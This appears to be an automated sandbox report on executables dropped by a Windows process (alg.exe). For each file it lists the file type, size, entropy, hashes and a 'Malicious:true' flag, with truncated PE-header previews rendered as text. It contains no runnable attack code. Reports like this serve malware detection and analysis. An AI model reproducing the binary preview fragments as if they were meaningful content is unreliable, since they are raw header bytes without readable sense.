                                                                                                                                                                                                    SHA-256:7758D1558219889F36A28C5B0F17FF1B5C1F512421F2C35E122F6FCD03743C2A
                                                                                                                                                                                                    SHA-512:D92DECDA9C0E79D4D3410ACEDA3F66F5DCB5F9150E4C6E0C7EDEF02E03CB8A2E6FC47AD78CB7C406601C0ED23F9848550E33F5063E2D82C8276CBDA4161E72BF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@..................................z......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1335296
                                                                                                                                                                                                    Entropy (8bit):5.236780575376811
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:Q4lssmroCPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:QcssmrNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:A781510BA6703208BE8DABA99BD1537B
                                                                                                                                                                                                    SHA1:4A0928620C77D49ACD641D6D4D2F3711EBE8B859
                                                                                                                                                                                                    SHA-256:B0A3B3117EAB0C779B5D773C42232B030659B032EEE19D9D8D31BD54B540E094
                                                                                                                                                                                                    SHA-512:DC60E49C296AA29C99018E01F4B1773FC3042AEBA4761798DC806B84DCE99580A6DF68F2E1D1E66F749964C8268931C66228E40D9C8AFD971A7B8E60823E1F0F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.....................................p.... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1383936
                                                                                                                                                                                                    Entropy (8bit):5.3385326365175825
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:U03cT++foSBWU2YxhkgOsqjnhMgeiCl7G0nehbGZpbD:r3cK+foQWU2YnPiDmg27RnWGj
                                                                                                                                                                                                    MD5:691AABF737D296DCF26C83B966353D65
                                                                                                                                                                                                    SHA1:289A11EF4A6455581A668B22196E77497D802910
                                                                                                                                                                                                    SHA-256:F3C5F5D2914A9C1499122FD27DFE0A6A8C0163DCA1E022EAE2251429C8B95E5B
                                                                                                                                                                                                    SHA-512:4C97ECEF9446E901233E9BB10293CFAC8DFA0723BFF2E91A55FD8CA434BE9943AA673E7DE9899BDBB518A38AD4B155634CA144293FD5969A90D0E0172FDCFCF6
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@.................................U........................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1221120
                                                                                                                                                                                                    Entropy (8bit):5.138910383569102
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:PbrNRzB+NuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:PbBRzBgusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:939C41B33928B6B8486EFE76466BFCB3
                                                                                                                                                                                                    SHA1:B0F25088D38F4603DEF37624B7022FEB34C673BC
                                                                                                                                                                                                    SHA-256:C671D9404C18E3CF9D08B6EF73382CB44B8AC17F7BDF6BA020985B0BA198FEEB
                                                                                                                                                                                                    SHA-512:1168AE6EB77A3724FFA4AE80DCE362D279CEBB4A9D68EEB69646835F715649F1959588EC07310D9DB958ECEECE459B66E692A2B1D0A1190FCAF8A48599412B3C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.............................................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2168832
                                                                                                                                                                                                    Entropy (8bit):7.940561354484731
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:49152:ly53w24gQu3TPZ2psFkiSqwoz4Dmg27RnWGj:lyFQgZqsFki+oz4D527BWG
                                                                                                                                                                                                    MD5:074A7B7E0310030ED68C537694D44058
                                                                                                                                                                                                    SHA1:71B8A7B9C2E97EACDE1EE2F07D772D3843A56473
                                                                                                                                                                                                    SHA-256:2C9503C0702841306786098C45C7AFEA639812F488DAD7570AD1B238CC6E0301
                                                                                                                                                                                                    SHA-512:0CAEEC1F64E4C6EC76E9F94C81C5FC4369DAFC3C11CA0E3F40D98F2F9B64B0DDE5453B62EBD85B1EDB651939182C46B773009EF9D5EC77FD66927629E9F75B5C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.......!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3141
                                                                                                                                                                                                    Entropy (8bit):4.840051517114781
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:sd3oiRZWt0WmI4auWqeNPWlb7W07eqWqNq3eWcv+lGgMKW0a:sWiRE5mHKjNuUdqk3BnSD
                                                                                                                                                                                                    MD5:522396593783FBDB3AB00ED2C8638482
                                                                                                                                                                                                    SHA1:A7C2808E7DF43CC951D669725CD1435CB6BC7AF2
                                                                                                                                                                                                    SHA-256:D56908D510FA58578311F481D1D6B2C19F17D122C8437C4A07E7ABA8D1E5F8F1
                                                                                                                                                                                                    SHA-512:3134F3ADC1B4F0E5CF3D35E7CE4DE956F6E480EF9C8C7F93177A8079DA8D22788088311AA12300562CE42A4D55799ADAAE61156AB1F7603296D7002DE18BCA3B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-11-22 12:55:03-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-11-22 12:55:03-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-11-22 12:55:03-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-11-22 12:55:0
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1356800
                                                                                                                                                                                                    Entropy (8bit):5.347835935053495
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:MQVTZu0JhsqjnhMgeiCl7G0nehbGZpbD:DVTZugDmg27RnWGj
                                                                                                                                                                                                    MD5:27652B586B1E4F9793415650BFFAE22A
                                                                                                                                                                                                    SHA1:786787A72EF8F82F62E0361A7B43E3DFC3B90076
                                                                                                                                                                                                    SHA-256:10D160BA2BBFD600BF597173FA46AB13CFB53743C4586D11C1687E4743A860E9
                                                                                                                                                                                                    SHA-512:E914430C3599644A35B27065BB9C9A5C004C3B50B7076C90EB931073A22592B119B9BA46E81F26C5D679F156258D9A90FCA8DE9C1FCA515A2945EEDF1388AFCF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1683968
                                                                                                                                                                                                    Entropy (8bit):5.62311620283488
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:x+gkESfh4CoWsqjnhMgeiCl7G0nehbGZpbD:4gkE+SMDmg27RnWGj
                                                                                                                                                                                                    MD5:32C36587EE77F098A75A965F9E022316
                                                                                                                                                                                                    SHA1:4B2C13FB0ACBA3446E599D9C1CDDDE55F1F5809D
                                                                                                                                                                                                    SHA-256:30D11849F6043E24965DE076B8DA9F6AAD1631F6461E63989B841CF48D753B08
                                                                                                                                                                                                    SHA-512:76B467B195A17608A3D1ECF4FF8F9F5EB9614BFFF41594CECD63A74EB09F40E5DBE3A21BA547C30EAC76C8094B82D4D3075CD00C3E584BC0797D4C8199B795CE
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ............ .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1532416
                                                                                                                                                                                                    Entropy (8bit):7.096639199471615
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:zBpDRmi78gkPXlyo0GtjrJsqjnhMgeiCl7G0nehbGZpbD:VNRmi78gkPX4o0GtjRDmg27RnWGj
                                                                                                                                                                                                    MD5:92804E38BF844B0C40BC38AD8D099628
                                                                                                                                                                                                    SHA1:30FDDC318708C542F111AFF86439BD5BAFD2D1C8
                                                                                                                                                                                                    SHA-256:80F4C88F45A452543C06C957B248B370752F3A8D03CE7A0B6154B4BC9DEB3E3A
                                                                                                                                                                                                    SHA-512:D5C4B793F0557B92E1EF9A0FFA38BCB6EC7C1352F7813343E387A16BE1E556D927A545EE41609E0F2564A5AFD8A259E15E8D96EDCB1EA41ACA151F33E0C5C934
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@........................................... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                    Entropy (8bit):7.229050955977382
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:HLOS2oTPIXVWsqjnhMgeiCl7G0nehbGZpbD:x/TpDmg27RnWGj
                                                                                                                                                                                                    MD5:17E21D40CF43487964359F4A7F1C3446
                                                                                                                                                                                                    SHA1:B77FB6CA90CCCCD09CE30B5BBFEDD9506195E2C6
                                                                                                                                                                                                    SHA-256:C37597884634222A59E5ADCA001B8CF746C2D6542A29CCA35011F86B4A4FFD81
                                                                                                                                                                                                    SHA-512:3786C1B659B7FC8FD7F777F7F64D52D97CDE11091FF94D762E946178B393A07E529D4F42152149E82A5A6840CFC649EAB12BFCED3322052A6F0F87E335C87D39
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@........................................... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1145344
                                                                                                                                                                                                    Entropy (8bit):5.031188333072859
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:/1wXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:/1wsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:0CB151B38B397A60877F1F22A973B056
                                                                                                                                                                                                    SHA1:B1EFA30388E548AD06A32F157B99DBABAC2E217E
                                                                                                                                                                                                    SHA-256:69F9FFD2A94773AE68F9E1DB4E555B6B7DD61C884F5F950BA5098A96267E63F7
                                                                                                                                                                                                    SHA-512:DDC4C1E550C614DD3C986F4B1A79C81DF927EE0BA52A94369B425503C89438D46080A6392CDE9A40D891D608C0BF2808862746150FF5D8094E32C7881DB1B98D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.................................z.......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1222656
                                                                                                                                                                                                    Entropy (8bit):6.712023847288794
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:zRudzLXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zAdzLsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:C0936C49C0A494383F0183E06B3DF861
                                                                                                                                                                                                    SHA1:DA80B2755C095515B47032B24D62779536247B67
                                                                                                                                                                                                    SHA-256:60DC5F393EC879C230E508F8ADC43F38E0297C336EEAEDF186A0049EB686830C
                                                                                                                                                                                                    SHA-512:879CA98A151690B3F3E0A9CEAADD679919AC8F5D8C9D46290745F9F575C8F559CD7B90AD4ABCA2979AEF8505E280CCEB5B58F56965C1621E90D5A1825E7921BF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@...................................."..... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1457664
                                                                                                                                                                                                    Entropy (8bit):5.082148451669624
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:5vnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:3D6CAE11D73927C92E05B3A57D537066
                                                                                                                                                                                                    SHA1:575299EA7E66ED3BB76140E423A7E249B97A1701
                                                                                                                                                                                                    SHA-256:4EA0F8B764D3B8EF9B9F3F1EFE8F7AF6536374188FA9F9DD40ADAFA360008794
                                                                                                                                                                                                    SHA-512:EEEB98CB95FB4077D127A8BA63CAC2BD47C71B410B1E4299289D5144ED1515026197E58F379E53DD894E83A13554B2E24A5CC66C82A7A9D64AE724E7B28F7B23
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@......................................... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1461248
                                                                                                                                                                                                    Entropy (8bit):5.4686172655328535
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:Y5zhM1XSE6sqjnhMgeiCl7G0nehbGZpbD:mMs/Dmg27RnWGj
                                                                                                                                                                                                    MD5:1E504A51EF51B1609138808E85037453
                                                                                                                                                                                                    SHA1:3678BF727040C7E030F9E4C7AE596B61C912EFE5
                                                                                                                                                                                                    SHA-256:8985778E5FB8EDEF309E2AB1C666E0A26B5E4B3E6D47BCC2190C4359BEDCA0E3
                                                                                                                                                                                                    SHA-512:B2C9864EBF9FB6BFE078D8AB1AF2104EB8715A2C3CB52E3AFEBE194D267F5B048170C47F72679E5082AEF13EC0EFADF2DC1BA4885DCCEEA83934F1AC29E36539
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.......................................... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4151808
                                                                                                                                                                                                    Entropy (8bit):6.499780023672939
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:49152:TtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755VDmg27RN:TjEIa4HIEWOc5DD527BWG
                                                                                                                                                                                                    MD5:52707CF94BCED28D9B0FF24549C5BDCB
                                                                                                                                                                                                    SHA1:2902A4D0F9B9BDF2A3AA20FC8175A863F663EC69
                                                                                                                                                                                                    SHA-256:B3D93B9D05EF60FF4FA83274252DAAFEAA4A150F842E74AE0CD565F043DA842B
                                                                                                                                                                                                    SHA-512:A8A2DA5A47C8C004773AD15D94B8EA9989D4ED2A4010D49025AF472177971407C8107046ADD00046731FFA73E00E6EFC7565A421C0A777AB8C9CA331D9B7BEA5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @......g?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):59941376
                                                                                                                                                                                                    Entropy (8bit):7.999367288825598
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1572864:tQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:mXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                    MD5:9A274D8791F8128AD3C5DB4EAE48A5AB
                                                                                                                                                                                                    SHA1:AB508A5AACA0806A1B25A883386BF086951BC583
                                                                                                                                                                                                    SHA-256:2AB80DAB3CD81F6FB494DBC40F2207316A1672264F1C8508EC2BCBBC0DE35758
                                                                                                                                                                                                    SHA-512:9AE77C372A6DE302316FD1EBA055F7A65884869E0EFCD9BBD61C483D869B374C89C27F92895EFEBC02B049FB2528A8BC080DCDDC3DD47D3A27B034356D042E17
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......$.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1180160
                                                                                                                                                                                                    Entropy (8bit):5.084805345149149
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:aWXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:aqsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:5FE26960617558276DF5D2A6A17DBAEB
                                                                                                                                                                                                    SHA1:A8F12A3ED4CDD9C1E45D40403C6D4E7ACB5E8303
                                                                                                                                                                                                    SHA-256:679028758D63CC827B98206EE41F465141A3FBB2BCD1965FDCF2FA003EEF5C0E
                                                                                                                                                                                                    SHA-512:097D3A2F4079A1495FFA96A76EE8D550887492B17C7B719C7E0FB0B0263DE8E9A93AE02BE1F4227D50AE9B06AD7D9F2C4CA3AEFDBB50FF892597F124E116EB43
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@............ .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6210048
                                                                                                                                                                                                    Entropy (8bit):6.386700069528037
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:49152:yDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTX9:DnN9KfxLk6GEQTX5UKzNDkD527BWG
                                                                                                                                                                                                    MD5:3AB21774C5B4FD1016930DA0B39A4A51
                                                                                                                                                                                                    SHA1:80EAE011AC2FE5E26DF40223168EB2B85294880C
                                                                                                                                                                                                    SHA-256:E10B99B7173F1EB392FC6D6BCBF176417850F620DF34542C8951D275A03EF270
                                                                                                                                                                                                    SHA-512:A9ADC358EB0683E1CF8AC4506BB82F82160ED68D8F999549FFD95E3D3ED12200840C2749B67C0E960EF19ADA99E15CDACA19F78F5C078477519E7F7A24677275
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......._... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................
